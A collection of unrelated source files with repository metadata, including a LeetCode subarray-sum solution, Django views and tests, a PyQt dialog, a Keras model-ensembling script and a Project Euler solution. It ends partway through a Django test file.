def subarraySum(self, nums: List[int], k: int) -> int:
# uses matrix as DP to store previous sums
# still exceeds time limit
count = 0
matrix = [[None] * len(nums) for _ in range(len(nums))]
for i in range(len(nums)):
if nums[i] == k: count += 1
matrix[i][i] = nums[i]
for row in range(len(nums)-1):
for col in range(row+1, len(nums)):
if row == 0:
matrix[row][col] = matrix[row][col-1] + nums[col]
else:
matrix[row][col] = matrix[row-1][col] - nums[row-1]
if matrix[row][col] == k:
count += 1
return count
# solution
def subarraySum(self, nums: List[int], k: int) -> int:
    # prefix-sum + hashmap: sums[p] counts how many prefixes summed to p;
    # a subarray ending here sums to k iff some earlier prefix equals sum-k
    count = 0
    sum = 0
    sums = { 0: 1 }  # the empty prefix
    for num in nums:
        sum += num
        if sum-k in sums:
            count += sums[sum-k]
        if sum in sums:
            sums[sum] += 1
        else:
            sums[sum] = 1
    return count
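# Worked example for the final solution (traced by hand from the code above):
# nums = [1, 1, 1], k = 2
#   num=1: sum=1, sum-k=-1 not in sums          -> sums={0:1, 1:1}
#   num=1: sum=2, sum-k=0 in sums, count -> 1   -> sums={0:1, 1:1, 2:1}
#   num=1: sum=3, sum-k=1 in sums, count -> 2
# which matches the two subarrays [1,1] that sum to 2.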
|
[
"jae@Jaes-MacBook-Air.local"
] |
jae@Jaes-MacBook-Air.local
|
7db5d35dbccea6fead70c32527134a787b99e276
|
1fe186fc74156a27bf632ab3694e38b9219b86a8
|
/python/test_data.py
|
12a560c9fb35847a139de6aa6c9a0039dde4489c
|
[
"LicenseRef-scancode-public-domain",
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
qchenclaire/caffe
|
53b0afb4963d8e9a50f45342e92ab4499012614e
|
e7b40681209b1266af919d76d4198c6d2560ae5b
|
refs/heads/master
| 2021-01-19T13:11:18.013451
| 2017-04-12T22:47:40
| 2017-04-12T22:47:40
| 88,069,682
| 1
| 0
| null | 2017-04-12T15:48:22
| 2017-04-12T15:48:22
| null |
UTF-8
|
Python
| false
| false
| 554
|
py
|
import caffe
import numpy as np
import random
import os, struct
from array import array
import share_data as sd
#from lmdb_reader import Read_Render4CNN
from lmdb_para import read_lmdb
import scipy.misc
import time
import pdb
import cPickle as pickle
#
class Render4CNNLayer_sub(caffe.Layer):
def setup(self, bottom, top):
print 'setup'
def reshape(self, bottom, top):
print 'reshape'
def forward(self, bottom, top):
print 'forward'
def backward(self, top, propagate_down, bottom):
print 'backward'
|
[
"qchen42@jhu.edu"
] |
qchen42@jhu.edu
|
c86e3a5ca3ef835199bd744fc5510a60133a16db
|
0e478f3d8b6c323c093455428c9094c45de13bac
|
/src/OTLMOW/OTLModel/Datatypes/DtcBeschermingVraatschade.py
|
8549c8df08b86c0c406b3f81a22fa46f65a82c8c
|
[
"MIT"
] |
permissive
|
davidvlaminck/OTLMOW
|
c6eae90b2cab8a741271002cde454427ca8b75ba
|
48f8c357c475da1d2a1bc7820556843d4b37838d
|
refs/heads/main
| 2023-01-12T05:08:40.442734
| 2023-01-10T15:26:39
| 2023-01-10T15:26:39
| 432,681,113
| 3
| 1
|
MIT
| 2022-06-20T20:36:00
| 2021-11-28T10:28:24
|
Python
|
UTF-8
|
Python
| false
| false
| 2,781
|
py
|
# coding=utf-8
from OTLMOW.OTLModel.BaseClasses.AttributeInfo import AttributeInfo
from OTLMOW.OTLModel.BaseClasses.OTLAttribuut import OTLAttribuut
from OTLMOW.OTLModel.Datatypes.BooleanField import BooleanField
from OTLMOW.OTLModel.Datatypes.ComplexField import ComplexField
from OTLMOW.OTLModel.Datatypes.KlMateriaalBeschermingVraatschade import KlMateriaalBeschermingVraatschade
# Generated with OTLComplexDatatypeCreator. To modify: extend, do not edit
class DtcBeschermingVraatschadeWaarden(AttributeInfo):
def __init__(self, parent=None):
AttributeInfo.__init__(self, parent)
self._materiaal = OTLAttribuut(field=KlMateriaalBeschermingVraatschade,
naam='materiaal',
label='materiaal',
objectUri='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#DtcBeschermingVraatschade.materiaal',
definition='De middelen als bescherming tegen vraatschade.',
owner=self)
self._tegenMaaischade = OTLAttribuut(field=BooleanField,
naam='tegenMaaischade',
label='tegen maaischade',
objectUri='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#DtcBeschermingVraatschade.tegenMaaischade',
definition='Aanduiding of er bescherming tegen maaischade aanwezig is.',
owner=self)
@property
def materiaal(self):
"""De middelen als bescherming tegen vraatschade."""
return self._materiaal.get_waarde()
@materiaal.setter
def materiaal(self, value):
self._materiaal.set_waarde(value, owner=self._parent)
@property
def tegenMaaischade(self):
"""Aanduiding of er bescherming tegen maaischade aanwezig is."""
return self._tegenMaaischade.get_waarde()
@tegenMaaischade.setter
def tegenMaaischade(self, value):
self._tegenMaaischade.set_waarde(value, owner=self._parent)
# Generated with OTLComplexDatatypeCreator. To modify: extend, do not edit
class DtcBeschermingVraatschade(ComplexField, AttributeInfo):
"""Complex datatype voor bescherming van de stam tegen knaagdieren."""
naam = 'DtcBeschermingVraatschade'
label = 'Bescherming vraatschade'
objectUri = 'https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#DtcBeschermingVraatschade'
definition = 'Complex datatype voor bescherming van de stam tegen knaagdieren.'
waardeObject = DtcBeschermingVraatschadeWaarden
def __str__(self):
return ComplexField.__str__(self)
|
[
"david.vlaminck@mow.vlaanderen.be"
] |
david.vlaminck@mow.vlaanderen.be
|
3854d86404411f1bba56b485b61bfda44efeb2f0
|
0f9a8549df83e39eb29012588c01c5fc434f4e4b
|
/menu/admin.py
|
e21ab520a36361c30a408efeec382301187e294e
|
[] |
no_license
|
f4225e0653/recipedb
|
729c53495a9329290a30f9b821e9def233d14bd4
|
d03943b6da5e0ab900fcd9d44388ff5997757eab
|
refs/heads/master
| 2021-01-22T20:55:43.598122
| 2017-03-18T07:54:17
| 2017-03-18T07:54:17
| 85,380,391
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 176
|
py
|
from django.contrib import admin
from .models import Recipe, RecipeIngredients
# Register your models here.
admin.site.register(Recipe)
admin.site.register(RecipeIngredients)
|
[
"nobody@nowhere.local"
] |
nobody@nowhere.local
|
599d158a305a75174cd7625ca13fb5240c520bcb
|
ceea602d004e21c85c925b3b5b259db49eec17d7
|
/flatpage_extended/urls.py
|
f09e3f5b2d2b044993e71b30481df8264dc03227
|
[] |
no_license
|
seivan/django_blog
|
38426c4477a7e12c50534ecfaadac9a569556f62
|
9cb7a35d6a5b5e29ff8c4ae5cb3c0c1441191c6b
|
refs/heads/master
| 2020-12-24T13:17:22.003468
| 2009-11-25T04:27:52
| 2009-11-25T04:27:52
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 143
|
py
|
from django.conf.urls.defaults import *
urlpatterns = patterns('seivanheidari.flatpage_extended.views',
(r'^(?P<url>.*)$', 'flatpage'),
)
|
[
"seivan@kth.se"
] |
seivan@kth.se
|
1327e5c7a206f319618cd37031e6f11e523d0d80
|
e942ac062e2a217735e37e9133dccb26cef4184e
|
/clawer/clawer/apis/user.py
|
9075d355b517f009b0dba4d10e7ca64c986b7f2a
|
[] |
no_license
|
xcctbys/crawl
|
11cc432b39866c5965d7511ff03cb45607db2244
|
95a5b590a82f20a22731b31dfe551a35b4b31fa1
|
refs/heads/master
| 2021-01-21T20:42:45.734344
| 2016-06-28T02:38:19
| 2016-06-28T02:38:19
| 92,269,774
| 2
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,978
|
py
|
#coding=utf-8
import json
import hashlib
import datetime
from django.contrib.auth import authenticate
from django.contrib.auth.models import User as DjangoUser, Group
from django.contrib.auth import login as djangologin
from django.contrib.auth import logout as djangologout
from django.core import exceptions
from django.core.urlresolvers import reverse
from django.utils.encoding import smart_unicode
from html5helper.decorator import render_json
from clawer.utils import check_auth_for_api
from clawer.models import UserProfile, MenuPermission
@render_json
def login(request):
username = request.GET.get("username")
password = request.GET.get("password")
    if request.user.is_authenticated():
        return {"is_ok":True, "profile":request.user.get_profile().as_json()}
user = authenticate(username=username, password=password)
if not user:
return {"is_ok":False, "reason":u"用户不存在或密码错误"}
if user.is_superuser and user.is_staff and user.is_active:
djangologin(request, user)
return {"is_ok":True, "profile":user.get_profile().as_json()}
if MenuPermission.has_perm_to_enter(user) == False:
        return {'is_ok':False, "reason":u"Insufficient permissions"}
djangologin(request, user)
return {"is_ok":True, "profile":user.get_profile().as_json()}
@render_json
@check_auth_for_api
def keepalive(request):
return {"is_ok":True, "profile":request.user.get_profile().as_json()}
@render_json
def logout(request):
djangologout(request)
return {"is_ok":True}
@render_json
@check_auth_for_api
def get_my_menus(request):
return MenuPermission.user_menus(request.user)
@render_json
def is_logined(request):
request.session["to"] = request.GET.get("to") or ""
if request.user.is_authenticated() is False:
result = {"is_ok":False}
return result
result = {"is_ok":True, "profile":request.user.get_profile().as_json()}
return result
|
[
"xiaotaop@princetechs.com"
] |
xiaotaop@princetechs.com
|
9759de82b067631295a9df8a9613f0a5f0fb3f71
|
7c06182477f708693a39bb450d096291eaa2b89d
|
/ui/ui_Dialog.py
|
7376538b222fc77fad5b7161592cef7708cdc146
|
[] |
no_license
|
Kracav4ik/zk3v
|
dee7414a007bc32833ca6ec31a4acdb505b6de5d
|
febd7b1f8f889355fccede96a68b4a5de425cc89
|
refs/heads/master
| 2020-07-02T19:21:19.239014
| 2020-02-07T20:42:28
| 2020-02-07T20:42:28
| 201,636,973
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,959
|
py
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ui\dialog.ui'
#
# Created by: PyQt5 UI code generator 5.12.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(270, 90)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(Dialog.sizePolicy().hasHeightForWidth())
Dialog.setSizePolicy(sizePolicy)
Dialog.setMaximumSize(QtCore.QSize(270, 90))
self.verticalLayout = QtWidgets.QVBoxLayout(Dialog)
self.verticalLayout.setObjectName("verticalLayout")
self.label = QtWidgets.QLabel(Dialog)
self.label.setObjectName("label")
self.verticalLayout.addWidget(self.label)
self.comboBox = QtWidgets.QComboBox(Dialog)
self.comboBox.setEditable(True)
self.comboBox.setObjectName("comboBox")
self.verticalLayout.addWidget(self.comboBox)
self.buttonBox = QtWidgets.QDialogButtonBox(Dialog)
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
self.buttonBox.setObjectName("buttonBox")
self.verticalLayout.addWidget(self.buttonBox)
self.retranslateUi(Dialog)
self.buttonBox.accepted.connect(Dialog.accept)
self.buttonBox.rejected.connect(Dialog.reject)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Change server address"))
self.label.setText(_translate("Dialog", "Type your address and port"))
|
[
"dikama2013@yandex.ru"
] |
dikama2013@yandex.ru
|
faeac85f38f5106c670b705a87a72d830f2d7a29
|
341446cb13aa6a09bc10bc6525a339e3b1cd45f2
|
/ensembler.py
|
86ffe14b04082f6d650564851ee1d6d14d077a6e
|
[] |
no_license
|
seamusl/OpenNAS-v1
|
ca86cfc6d7486a3c53103f2be260a6468afb7ccc
|
8983ab8cf5b7cf39c8fb1c6709cddb9944fcf46f
|
refs/heads/master
| 2023-03-25T12:54:23.976658
| 2021-01-10T20:03:00
| 2021-01-10T20:03:00
| 264,767,562
| 0
| 0
| null | 2021-03-25T23:45:49
| 2020-05-17T22:20:21
|
Python
|
UTF-8
|
Python
| false
| false
| 5,691
|
py
|
# Copyright (c) 2020 Seamus Lankford
# Licensed under MIT License
import warnings
warnings.simplefilter(action='ignore')
from keras.utils import to_categorical
from sklearn.metrics import accuracy_score
import tensorflow as tf
from tensorflow.keras.models import load_model
import numpy as np
import matplotlib.pyplot as plt
import joblib
from pre_processor import pre_processor
import config as cfg
def fit_model(ui):
print("Compiling model...") # initialize the optimizer and model
opt = tf.keras.optimizers.SGD(lr=0.0001)
model = load_model(ui.m_name) # LOAD autonas base model
print(model.summary())
config = model.to_json()
loaded_model = tf.keras.models.model_from_json(config)
loaded_model.compile(loss="sparse_categorical_crossentropy", optimizer=opt, metrics=["accuracy"])
print("Training base learner...") # train the network
loaded_model.fit(trainX, trainY, validation_data=(testX, testY),
batch_size=32, epochs=ui.epochs, verbose=2)
return loaded_model
def load_models(num_models): # load models from disk
all_models = list()
for i in range(num_models):
filename = 'model_' + str(i + 1) + '.h5' # filename for this ensemble
model = tf.keras.models.load_model(filename) # load model from the file
all_models.append(model) # add model to the list
print('Loaded %s' % filename)
return all_models
def stacked_dataset(members, inputX):
stackX = None # initially no layers in stack
for model in members:
y_pred = model.predict(inputX, verbose=0) # make prediction
if stackX is None: # stack predictions into [rows, members, probabilities]
stackX = y_pred # add first layer to stack
else:
stackX = np.dstack((stackX, y_pred)) # add new layer to stack
# flatten predictions to [rows, members x probabilities]
stackX = stackX.reshape((stackX.shape[0], stackX.shape[1]*stackX.shape[2]))
return stackX
def stacked_prediction(members, model, inputX): # make a prediction with the stacked model
stackedX = stacked_dataset(members, inputX) # create dataset using ensemble
y_pred = model.predict(stackedX) # make predictions
return y_pred
# Using ensemble outputs, create stacked training dataset for meta learner.
# feed outputs from ensemble base learners and fit a meta learner.
def fit_stacked_model(members, inputX, inputy, algorithm):
# create meta learner data set using ensemble base learner predictions. The features of the new data set
# returned, stackedX, are simply the predictions of each of the base learners for each instance. Therefore
# more base learners => greater number of features in the new data set. stackedX and inputy (i.e. the
# corresponding correct label outputs are used to fit a new model with the chosen classifier.
stackedX = stacked_dataset(members, inputX) # create data set from ensemble base learners
# start of Phase B
model = algorithm # assign user defined model algorithm for training
# fit using aggregate feature data from base learners and output labels
model.fit(stackedX, inputy)
return model
def ensemble_classifiers(base_learners, ui):
testYc = to_categorical(testY)
# evaluate standalone models on test set
# performance of standalone models can be compared with ensemble performance
for model in base_learners:
_, acc = model.evaluate(testX, testYc, verbose=0)
print('Model Accuracy: %.4f' % acc)
results = []
names = []
for name, meta in cfg.meta_learners: # evaluate multiple classifier models
print("Training meta learner with ", meta, "...") # train the meta learner wi
# th its own data set
# fit stacked model using the ensemble
model = fit_stacked_model(base_learners, testX, testY, meta)
# evaluate meta learner on test set
y_pred = stacked_prediction(base_learners, model, testX)
acc = accuracy_score(y_pred, testY)
results.append(acc)
names.append(name)
print('Ensemble Meta learner Test Accuracy: %.4f' % acc)
# since we are using a sci-kit learn classifier (and not keras), use joblib library to store model
filename = 'model_' + str(name) + '.sav' # save the model to disk
joblib.dump(model, filename)
print('Saved %s' % filename)
plt.figure(figsize=(9, 3))
plt.subplot(132)
plt.scatter(names, results)
plt.suptitle('Algorithm Comparison')
plt.savefig('ensemble_comparison.png')
return
def create_base_learners(ui):
# fit each base learner with same dataset and save models
# weights of each model randomly initialised
# => different base learner model saved with each iteration
for i in range(ui.n_base):
H = fit_model(ui)
filename = 'model_' + str(i + 1) + '.h5'
H.save(filename) # save model
print('Saved %s' % filename)
return
def ensemble(ui):
global trainX, trainY, testX, testY # these globals only needed within ensemble module
print("[INFO] pre-processing", ui.dataset, "...")
trainX, trainY, testX, testY = pre_processor(ui)
if ui.learners:
create_base_learners(ui)
# train meta-learner using predictions from base learners
base_learners = load_models(ui.n_base) # load all models
print('Loaded %d models' % len(base_learners)) # check if all base learner models loaded
ensemble_classifiers(base_learners, ui)
return
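# Example driver (a sketch; `UI` is a hypothetical stand-in for whatever config
# object callers pass in -- only the attributes referenced above are assumed):
#   class UI: pass
#   ui = UI()
#   ui.dataset, ui.m_name, ui.epochs = 'cifar10', 'autonas_base.h5', 10
#   ui.n_base, ui.learners = 3, True
#   ensemble(ui)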
|
[
"noreply@github.com"
] |
seamusl.noreply@github.com
|
a75ddc8ce256a732867b2936e5cbaf3093f8f37b
|
41f94396e4f5e61d2c3a1c684bc0b08d4e426b58
|
/practice2.py
|
4bd5b772868ad50712a8d398331bb5aa59126160
|
[] |
no_license
|
enochnord/hello-world
|
71a4d2f3a1cbae84f1896c5296a675ffd94907b4
|
19eccd30ccd68d4c619b0676af97b131a26e0286
|
refs/heads/master
| 2020-05-18T14:05:51.242334
| 2020-01-15T19:33:50
| 2020-01-15T19:33:50
| 184,460,847
| 0
| 0
| null | 2019-05-01T18:38:12
| 2019-05-01T18:18:51
| null |
UTF-8
|
Python
| false
| false
| 852
|
py
|
stuff = {'rope': 1, 'torch': 6, 'gold coin': 42, 'dagger': 1, 'arrow': 12}
def displayInventory(inventory):
total_items = 0
for item, quantity in inventory.items():
print(str(quantity)+' '+item)
total_items += quantity
print("Total number of items: "+str(total_items))
displayInventory(stuff)
def addToInventory(inventory, addedItems):
for item in addedItems:
inventory.setdefault(item, 0) #this adds a (defaulted to zero value) key to the inventory dict if it's not already there
inventory[item] += 1 #and this increases that value by one, each time that item appears in the loot list
return inventory
inv = {'gold coin': 42, 'rope': 1}
dragonLoot = ['gold coin', 'dagger', 'gold coin', 'gold coin', 'ruby']
inv = addToInventory(inv, dragonLoot)
displayInventory(inv)
|
[
"noreply@github.com"
] |
enochnord.noreply@github.com
|
0f1563570949b62727a7761f33d868a9e9c786b9
|
98d7d234b105c9fe55d1338d611e427fd8bc3552
|
/autotest_platform/kernel_os_kvm-test/log.py
|
fda93c60b2f273f6229bf5810384b1b2ff409433
|
[] |
no_license
|
jianxiamage/autotest_platform
|
b0af178060c61d0b557e7d85c83c535b585a56c1
|
d5db850e1cf8c1fb5c7c810de1eca9484257975f
|
refs/heads/master
| 2020-05-19T12:45:29.857986
| 2019-05-05T11:34:16
| 2019-05-05T11:34:16
| 185,022,420
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,783
|
py
|
#!/usr/bin/env python
#coding=utf-8
import os
import sys
import logging
#Log level     Description
#DEBUG         Most detailed log information; the typical use case is problem diagnosis
#INFO          Slightly less detailed than DEBUG; usually records key checkpoints, used to confirm everything works as expected
#WARNING       Logged when something unexpected happens (e.g. disk space is low) while the application still runs normally
#ERROR         Logged when a more serious problem prevents some functionality from working
#CRITICAL      Logged when a fatal error occurs and the application cannot keep running
#%Y-%m-%d\ %T
#LOG_FORMAT = "%(asctime)s - %(levelname)s - %(user)s[%(ip)s] - %(message)s"
#DATE_FORMAT = "%m/%d/%Y %H:%M:%S %p"
#For example:
#logging.debug('debug 信息')
#logging.info('info 信息')
#logging.warning('warning 信息')
#logging.error('error 信息')
#logging.critical('critial 信息')
logging.basicConfig(level=logging.INFO, # log level printed to the console
                    filename='/var/log/kernel_os_kvm_Test.log',
                    filemode='a', # mode is 'w' or 'a': 'w' rewrites the log on every run, overwriting the previous one;
                    # 'a' is append mode, which is also the default when omitted
format=
#'%(asctime)s - %(pathname)s[line:%(lineno)d] - %(levelname)s: %(message)s'
'[%(levelname)s : %(asctime)s] : %(message)s',
#datefmt = "%m/%d/%Y %H:%M:%S"
datefmt = "%Y-%m-%d %T"
)
if __name__ == '__main__':
strArgs=sys.argv
|
[
"mazhongzheng@loongson.cn"
] |
mazhongzheng@loongson.cn
|
288a7b08c5cf71f0640230acae8d22b897df5ede
|
e780a5bd72f98ca2513c993d64a85b08578166a6
|
/buildout-cache/eggs/Zope2-2.13.26-py2.7.egg/Testing/custom_zodb.py
|
b59b8c0f0a189811d25e949bf0df349935e37124
|
[] |
no_license
|
vedantc98/Plone-test
|
023246597ffe848e2a49b9f65742ff49127b190b
|
9fd520fc78481e2c0b9b7ec427821e7f961c777e
|
refs/heads/master
| 2021-03-30T22:14:33.368739
| 2018-03-11T19:22:58
| 2018-03-11T19:22:58
| 124,671,713
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,212
|
py
|
import os
import logging
import ZODB
LOG = logging.getLogger('Testing')
def getStorage():
""" Return a storage instance for running ZopeTestCase based
tests. By default a DemoStorage is used. Setting
$TEST_ZEO_HOST/TEST_ZEO_PORT environment variables allows you
to use a ZEO server instead. A file storage can be configured
        by setting the $TEST_FILESTORAGE environment variable.
"""
get = os.environ.get
if os.environ.has_key('TEST_ZEO_HOST') and os.environ.has_key('TEST_ZEO_PORT'):
from ZEO.ClientStorage import ClientStorage
zeo_host = get('TEST_ZEO_HOST')
zeo_port = int(get('TEST_ZEO_PORT'))
LOG.info('Using ZEO server (%s:%d)' % (zeo_host, zeo_port))
return ClientStorage((zeo_host, zeo_port))
elif os.environ.has_key('TEST_FILESTORAGE'):
import ZODB.FileStorage
datafs = get('TEST_FILESTORAGE')
LOG.info('Using Filestorage at (%s)' % datafs)
return ZODB.FileStorage.FileStorage(datafs)
else:
from ZODB.DemoStorage import DemoStorage
LOG.info('Using DemoStorage')
return DemoStorage()
Storage = getStorage()
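# Example (hypothetical shell sessions showing how the environment variables
# documented above select the storage):
#   $ TEST_ZEO_HOST=localhost TEST_ZEO_PORT=8100 python runtests.py   # ClientStorage
#   $ TEST_FILESTORAGE=/tmp/test.fs python runtests.py                # FileStorage
# With neither set, a fresh DemoStorage is used.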
|
[
"vedantc98@gmail.com"
] |
vedantc98@gmail.com
|
4a82493f4fd45a7fd6c13c09e0044536e96d7feb
|
12bf679fe5c13baf581650cc558cd44b63c1a0d2
|
/problem75.py
|
c97dc05dc2da0de7dd2cd9b1a4e62f4c64cadaeb
|
[] |
no_license
|
ganzevoort/project-euler
|
ed119f23cd5b63a6fcd5df6b581513c92d1790f6
|
0fea6b3465272895536b7ed3bff10bf3e0d84154
|
refs/heads/master
| 2022-09-12T16:19:06.696279
| 2022-09-02T17:03:52
| 2022-09-02T17:03:52
| 9,947,769
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,484
|
py
|
"""
https://projecteuler.net/problem=75
Singular integer right triangles
Problem 75
It turns out that 12 cm is the smallest length of wire that can be
bent to form an integer sided right angle triangle in exactly one
way, but there are many more examples.
12 cm: (3,4,5)
24 cm: (6,8,10)
30 cm: (5,12,13)
36 cm: (9,12,15)
40 cm: (8,15,17)
48 cm: (12,16,20)
In contrast, some lengths of wire, like 20 cm, cannot be bent to
form an integer sided right angle triangle, and other lengths allow
more than one solution to be found; for example, using 120 cm it
is possible to form exactly three different integer sided right
angle triangles.
120 cm: (30,40,50), (20,48,52), (24,45,51)
Given that L is the length of the wire, for how many values of
L ≤ 1,500,000 can exactly one integer sided right angle triangle
be formed?
"""
import time
import math
import itertools
import functools
import operator
from collections import defaultdict
from pprint import pprint
import pyprimesieve
def solution1(L=1500000, verbose=False):
t0 = time.time()
# find all a, b, c
# where 0 < a < b
# a**2 + b**2 = c**2
# a + b + c <= L
triangles = defaultdict(list)
for a in range(1, L):
for b in range(a+1, L):
c = math.floor(math.sqrt(a**2 + b**2))
if a**2 + b**2 != c**2:
continue
if a + b + c <= L:
if verbose and isinstance(verbose, int) and verbose>1:
print(f"{a+b+c}cm: ({a},{b},{c})")
triangles[a+b+c].append((a,b,c))
if verbose:
print("s1 L={} {:8}ms phase1".format(
L, int(1000*(time.time()-t0))))
if isinstance(verbose, int) and verbose>1:
pprint(triangles)
result = sum(1 for n in triangles.values() if len(n)==1)
if verbose:
print("s1 L={} {:8}ms result={}".format(
L, int(1000*(time.time()-t0)), result))
return result
def solution2(L=1500000, verbose=False):
t0 = time.time()
# Is math.floor(math.sqrt(a**2 + b**2)) expensive?
# if a + b + c <= L, then c < L/2
root = { c**2: c for c in range(1, L//2) }
if verbose:
print("s2 L={} {:8}ms precalculate roots".format(
L, int(1000*(time.time()-t0))))
triangles = defaultdict(list)
for bsquare, b in root.items():
if verbose and isinstance(verbose, int) and verbose>2:
if b%1000 == 0:
print("s2 L={} {:8}ms b={}".format(
L, int(1000*(time.time()-t0)), b))
for asquare, a in root.items():
if asquare >= bsquare:
break
csquare = asquare + bsquare
if csquare in root:
c = root[csquare]
if a + b + c <= L:
if verbose and isinstance(verbose, int) and verbose>1:
print(f"{a+b+c}cm: ({a},{b},{c})")
triangles[a+b+c].append((a,b,c))
if verbose:
print("s2 L={} {:8}ms phase1".format(
L, int(1000*(time.time()-t0))))
if isinstance(verbose, int) and verbose>1:
pprint(triangles)
result = sum(1 for n in triangles.values() if len(n)==1)
if verbose:
print("s2 L={} {:8}ms result={}".format(
L, int(1000*(time.time()-t0)), result))
return result
def solution3(L=1500000, verbose=False):
"""
for positive integers a, b, c where a < b < c and a² + b² = c²:
let x = b - a, y = c - b
then a² + (a+x)² = (a+x+y)²
a² + a² + 2ax + x² = a² + 2a(x+y) + (x+y)²
a² + a² + 2ax + x² = a² + 2ax + 2ay + x² + 2xy + y²
a² = 2ay + 2xy + y²
y = 1 => a² = 2a + 2x + 1 => x = (a² - 2a - 1)/2 = a²/2 - a - 1/2
x is a positive integer, so a is odd, a >= 3
x | y | a | b | c
-----+-----+-----+-----+-----
1 | 1 | 3 | 4 | 5
7 | 1 | 5 | 12 | 13
17 | 1 | 7 | 24 | 25
31 | 1 | 9 | 40 | 41
49 | 1 | 11 | 60 | 61
y = 2 => a² = 4a + 4x + 4 => x = (a² - 4a - 4)/4 = a²/4 - a - 1
x is a positive integer, so a is even, a >= 6
x | y | a | b | c
-----+-----+-----+-----+-----
2 | 2 | 6 | 8 | 10
7 | 2 | 8 | 15 | 17
14 | 2 | 10 | 24 | 26
23 | 2 | 12 | 35 | 37
34 | 2 | 14 | 48 | 50
y = 3 => a² = 6a + 6x + 9 => x = (a² - 6a - 9)/6 = a²/6 - a - 3/2
x is a positive integer, so a is odd, multiple of 3, a >= 9
x | y | a | b | c
-----+-----+-----+-----+-----
3 | 3 | 9 | 12 | 15
21 | 3 | 15 | 36 | 39
51 | 3 | 21 | 72 | 75
93 | 3 | 27 | 120 | 123
147 | 3 | 33 | 180 | 183
general case:
y > 3 => a² = 2ay + 2xy + y² => x = (a² - 2ay - y²) / 2y = a²/(2y) - a - y/2
if y is odd, a must be odd, a² is a multiple of y
if y is even, a must be even, a² is a multiple of 2y
        if y is even, 2y = prod(pi^yi) for pi prime, yi integer > 0,
        then y' = prod(pi^ceil(yi/2))
        then a² is a multiple of y iff a is a multiple of y'
        and a² is a multiple of 2y if a is a multiple of y' and p0==2, y0 is odd,
        or a is a multiple of 2y'
    y is maximal when c is large and a and b are close to each other.
    Then y < (√2 - 1) L / (√2 + 2) < L/8
x > 0, so a² - 2ay - y² > 0, so a² - 2ay > y²
quadratic formula:
ax²+bx+c = 0, then x = (-b±√(b²-4ac))/(2a)
variable substitution: x:a, a:1, b:-2y, c:-y²
a²-2ya-y² = 0, then a = (2y±√(4y²+4y²))/2 = y ± y√2
so, a >= y + y√2
"""
t0 = time.time()
triangles = set()
dups = set()
for y in range(1, L//8):
factorized = pyprimesieve.factorize(y)
y_prime = functools.reduce(
operator.mul,
(p**((i+1)//2) for p,i in factorized),
1
)
if y % 2 == 1:
base = y_prime
step = y_prime * 2
else:
base = y_prime
if factorized[0][0] == 2 and factorized[0][1] % 2 == 0:
base *= 2
step = base
lwb_a = math.ceil(y*(1+math.sqrt(2)))
new_base = math.ceil((lwb_a - base) / step) * step + base
for a in itertools.count(new_base, step):
x = (a*a - 2*a*y - y*y) // (2*y)
b = a + x
c = b + y
l = a + b + c
if l > L:
break
if isinstance(verbose, int) and verbose>2:
print(f"s3 L={L}, x={x} y={y} y'={y_prime} ({a},{b},{c}) {a+b+c}cm")
if l in triangles:
dups.add(l)
else:
triangles.add(l)
if verbose:
print("s3 L={} {:8}ms phase1".format(
L, int(1000*(time.time()-t0))))
if isinstance(verbose, int) and verbose>1:
print("triangles: {}\ndups: {}".format(
",".join(map(str, sorted(triangles))),
",".join(map(str, sorted(dups)))))
result = len(triangles) - len(dups)
if verbose:
print("s3 L={} {:8}ms result={}".format(
L, int(1000*(time.time()-t0)), result))
return result
solution = solution3
if __name__ == '__main__':
solution1(verbose=3, L=120)
solution2(verbose=3, L=120)
solution3(verbose=3, L=120)
solution2(verbose=True, L=10000)
solution3(verbose=True, L=10000)
solution(verbose=True)
|
[
"ganzevoort@gw20e.com"
] |
ganzevoort@gw20e.com
|
84cdbb979c2f212c1dc2187b7c185ec753d0e0d2
|
34053eab55920cd06b90b05c7995d45b3fb279ba
|
/customer/tests/test_views.py
|
8b0dcaba159fb519f8072af98ae429e9bf8412a9
|
[] |
no_license
|
yassinejr/MedicalStoreManagementSystem-Backend
|
bc2706abac3faf8b53ba62fe319e8fa4c55a7057
|
2908560af63b91e8731ae8115272d505cd773c49
|
refs/heads/main
| 2023-03-21T01:04:56.333791
| 2021-03-03T22:47:19
| 2021-03-03T22:47:19
| 338,150,949
| 0
| 0
| null | 2021-03-03T22:47:20
| 2021-02-11T20:57:41
|
Python
|
UTF-8
|
Python
| false
| false
| 1,320
|
py
|
import json
from django.urls import reverse
from rest_framework import status
from .test_setup import TestSetUp
class CustomerTests(TestSetUp):
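    # These tests rely on fixtures assumed to come from TestSetUp: a seeded
    # customer with pk=1 named 'customer zarzis', and self.data holding a
    # valid customer payload for the POST case.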
def test_view_customers(self):
url = reverse('customer:customer-list')
response = self.client.get(url, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_post_customer(self):
url = reverse('customer:customer-list')
response = self.client.post(url, self.data, format='json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_customer_detail(self):
